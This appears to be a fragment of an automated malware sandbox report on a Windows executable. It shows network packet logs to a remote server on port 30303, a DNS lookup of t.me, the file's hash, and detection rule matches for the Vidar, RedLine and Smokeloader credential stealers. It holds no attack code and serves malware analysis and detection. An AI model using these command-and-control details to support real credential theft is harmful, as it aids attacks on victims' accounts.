                                                          May 28, 2023 10:46:22.754215002 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:22.754666090 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:22.779701948 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.136292934 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.136447906 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.140424967 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.162672997 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163690090 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163734913 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163753986 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163773060 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163791895 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163810968 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163835049 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163839102 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.163855076 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.163887024 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.163959026 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.164143085 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.164161921 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.164221048 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.164277077 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.185832024 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.185858011 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.185884953 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.185910940 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.185925961 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.185925961 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.185940027 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.185967922 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.185973883 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.185973883 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.185991049 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.185996056 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186033964 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186042070 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186069965 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186080933 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186083078 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186106920 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186131954 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186132908 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186157942 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186181068 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186181068 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186183929 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186204910 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186211109 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186229944 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186233044 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186249971 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186254978 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186275959 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186283112 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186296940 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186302900 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186316967 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186321020 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186345100 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.186346054 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186362028 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.186393976 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.208338976 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.208372116 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.208400011 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.208427906 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.208458900 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.208487988 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.208498955 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.208499908 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.208499908 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.208517075 CEST3030349685188.34.154.187192.168.2.3
                                                          May 28, 2023 10:46:23.208542109 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:23.208542109 CEST4968530303192.168.2.3188.34.154.187
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 28, 2023 10:46:22.339339018 CEST5986953192.168.2.38.8.8.8
                                                          May 28, 2023 10:46:22.353594065 CEST53598698.8.8.8192.168.2.3
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          May 28, 2023 10:46:22.339339018 CEST192.168.2.38.8.8.80x7edeStandard query (0)t.meA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          May 28, 2023 10:46:22.353594065 CEST8.8.8.8192.168.2.30x7edeNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                          • t.me
                                                          • 188.34.154.187:30303
                                                          No statistics
                                                          Target ID:0
                                                          Start time:10:46:00
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\Desktop\06625899.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\06625899.exe
                                                          Imagebase:0x400000
                                                          File size:404992 bytes
                                                          MD5 hash:22CD094D925FB41F446ED4DB24CC8C35
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low

                                                          No disassembly